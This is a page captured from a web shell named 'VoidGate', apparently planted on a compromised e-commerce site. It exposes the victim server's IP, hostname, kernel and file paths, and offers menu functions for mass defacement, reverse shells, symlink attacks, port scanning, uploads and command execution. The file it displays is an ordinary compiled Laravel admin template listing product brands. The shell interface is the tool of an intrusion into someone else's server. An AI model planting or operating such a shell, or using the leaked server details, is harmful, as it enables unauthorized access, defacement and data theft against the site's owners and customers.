ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: aa27dd682b15c5fff218016293f0d3ba.php
<?php $__env->startSection('title', translate('brand_List')); ?> <?php $__env->startSection('content'); ?> <div class="content container-fluid"> <div class="mb-3"> <h2 class="h1 mb-0 d-flex align-items-center gap-2"> <img width="20" src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/brand.png')); ?>" alt=""> <?php echo e(translate('brand_List')); ?> <span class="badge text-dark bg-body-secondary fw-semibold rounded-50"><?php echo e($brands->total()); ?></span> </h2> </div> <div class="row mt-20"> <div class="col-md-12"> <div class="card"> <div class="card-body d-flex flex-column gap-20"> <div class="d-flex justify-content-between align-items-center gap-20 flex-wrap"> <form action="<?php echo e(url()->current()); ?>" method="GET" class="flex-grow-1"> <div class="input-group max-w-300"> <input id="datatableSearch_" type="search" name="searchValue" class="form-control" placeholder="<?php echo e(translate('search_by_brand_name')); ?>" aria-label="<?php echo e(translate('search_by_brand_name')); ?>" value="<?php echo e(request('searchValue')); ?>" required> <div class="input-group-append search-submit"> <button type="submit"> <i class="fi fi-rr-search"></i> </button> </div> </div> </form> <div class="dropdown"> <a type="button" class="btn btn-outline-primary" href="<?php echo e(route('admin.brand.export', ['searchValue' => request('searchValue')])); ?>"> <i class="fi fi-sr-inbox-in"></i> <span class="fs-12"><?php echo e(translate('export')); ?></span> </a> </div> </div> <div class="table-responsive"> <table class="table table-hover table-borderless align-middle"> <thead class="text-capitalize"> <tr> <th><?php echo e(translate('SL')); ?></th> <th><?php echo e(translate('brand_Logo')); ?></th> <th class="max-width-100px"><?php echo e(translate('name')); ?></th> <th class="text-center"><?php echo e(translate('total_Product')); ?></th> <th class="text-center"><?php echo e(translate('total_Order')); ?></th> <th class="text-center"><?php echo e(translate('status')); ?></th> <th class="text-center"> <?php echo e(translate('action')); ?></th> </tr> </thead> <tbody> <?php $__currentLoopData = $brands; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $brand): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td><?php echo e($brands->firstItem() + $key); ?></td> <td> <div class="avatar-60 d-flex align-items-center rounded"> <img class="img-fluid h-100 object-fit-cover w-100 rounded" alt="" src="<?php echo e(getStorageImages(path: $brand->image_full_url, type: 'backend-brand')); ?>"> </div> </td> <td class="overflow-hidden max-w-100px"> <h6 class="fs-14 line-1 max-w-200 text-truncate" data-bs-toggle="tooltip" data-bs-placement="right" aria-label="<?php echo e($brand['defaultname']); ?>" data-bs-title="<?php echo e($brand['defaultname']); ?>"><?php echo e($brand['defaultname']); ?></h6> <span class="fs-12"><?php echo e(translate('ID')); ?> #<?php echo e($brand['id']); ?></span> </td> <td class="text-center"><?php echo e($brand['brand_all_products_count']); ?></td> <td class="text-center"> <?php echo e($brand['brandAllProducts']->sum('order_details_count')); ?></td> <td> <form action="<?php echo e(route('admin.brand.status-update')); ?>" method="post" id="brand-status<?php echo e($brand['id']); ?>-form" class="no-reload-form"> <?php echo csrf_field(); ?> <input type="hidden" name="id" value="<?php echo e($brand['id']); ?>"> <label class="switcher mx-auto" for="brand-status<?php echo e($brand['id']); ?>"> <input class="switcher_input custom-modal-plugin" type="checkbox" value="1" name="status" id="brand-status<?php echo e($brand['id']); ?>" <?php echo e($brand['status'] == 1 ? 'checked' : ''); ?> data-modal-type="input-change-form" data-modal-form="#brand-status<?php echo e($brand['id']); ?>-form" data-on-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/brand-status-on.png')); ?>" data-off-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/brand-status-off.png')); ?>" data-on-title = "<?php echo e(translate('Want_to_Turn_ON') . ' ' . $brand['defaultname'] . ' ' . translate('status')); ?>" data-off-title = "<?php echo e(translate('Want_to_Turn_OFF') . ' ' . $brand['defaultname'] . ' ' . translate('status')); ?>" data-on-message = "<p><?php echo e(translate('if_enabled_this_brand_will_be_available_on_the_website_and_customer_app')); ?></p>" data-off-message = "<p><?php echo e(translate('if_disabled_this_brand_will_be_hidden_from_the_website_and_customer_app')); ?></p>" data-on-button-text="<?php echo e(translate('turn_on')); ?>" data-off-button-text="<?php echo e(translate('turn_off')); ?>"> <span class="switcher_control"></span> </label> </form> </td> <td> <div class="d-flex justify-content-center gap-3"> <a class="btn btn-outline-info icon-btn" title="<?php echo e(translate('edit')); ?>" href="<?php echo e(route('admin.brand.update', [$brand['id']])); ?>"> <i class="fi fi-sr-pencil"></i> </a> <a class="btn btn-outline-danger icon-btn delete-brand" title="<?php echo e(translate('delete')); ?>" data-product-count = "<?php echo e(count($brand?->brandAllProducts)); ?>" data-text="<?php echo e(translate('there_were_') . count($brand?->brandAllProducts) . translate('_products_under_this_brand') . '.' . translate('please_update_their_brand_from_the_below_list_before_deleting_this_one') . '.'); ?>" id="<?php echo e($brand['id']); ?>"> <i class="fi fi-rr-trash"></i> </a> </div> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> </div> <div class="table-responsive mt-4"> <div class="d-flex justify-content-lg-end"> <?php echo e($brands->links()); ?> </div> </div> <?php if(count($brands) == 0): ?> <?php echo $__env->make( 'layouts.admin.partials._empty-state', ['text' => 'no_brand_found'], ['image' => 'default'] , array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php endif; ?> </div> </div> </div> </div> </div> <span id="route-admin-brand-delete" data-url="<?php echo e(route('admin.brand.delete')); ?>"></span> <span id="route-admin-brand-status-update" data-url="<?php echo e(route('admin.brand.status-update')); ?>"></span> <span id="get-brands" data-brands="<?php echo e(json_encode($brands)); ?>"></span> <div class="modal fade" id="select-brand-modal" tabindex="-1" aria-labelledby="toggle-modal" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered"> <div class="modal-content shadow-lg"> <div class="modal-header border-0 pb-0 d-flex justify-content-end"> <button type="button" class="btn-close border-0 btn-circle bg-section2 shadow-none" data-bs-dismiss="modal" aria-label="Close"> </button> </div> <div class="modal-body px-4 px-sm-5 pt-0 pb-sm-5"> <div class="d-flex flex-column align-items-center text-center gap-2 mb-2"> <div class="toggle-modal-img-box d-flex flex-column justify-content-center align-items-center mb-3 position-relative"> <img src="<?php echo e(dynamicAsset('public/assets/new/back-end/img/icons/info.svg')); ?>" alt="" width="90" /> </div> <h5 class="modal-title mb-2 brand-title-message"></h5> </div> <form action="<?php echo e(route('admin.brand.delete')); ?>" method="post" class="product-brand-update-form-submit"> <?php echo csrf_field(); ?> <input name="id" hidden=""> <div class="gap-2 mb-3"> <label class="form-label" for="exampleFormControlSelect1"><?php echo e(translate('select_Category')); ?> <span class="text-danger">*</span> </label> <select class="custom-select brand-option" name="brand_id" data-placeholder="Select from dropdown" required> <option></option> </select> </div> <div class="d-flex justify-content-center gap-3"> <button type="submit" class="btn btn-primary min-w-120"><?php echo e(translate('update')); ?></button> <button type="button" class="btn bg-danger text-danger bg-opacity-10 min-w-120" data-bs-dismiss="modal"><?php echo e(translate('cancel')); ?></button> </div> </form> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startPush('script'); ?> <script src="<?php echo e(dynamicAsset(path: 'public/assets/backend/admin/js/products/products-management.js')); ?>"></script> <?php $__env->stopPush(); ?> <?php echo $__env->make('layouts.admin.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/brand/list.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick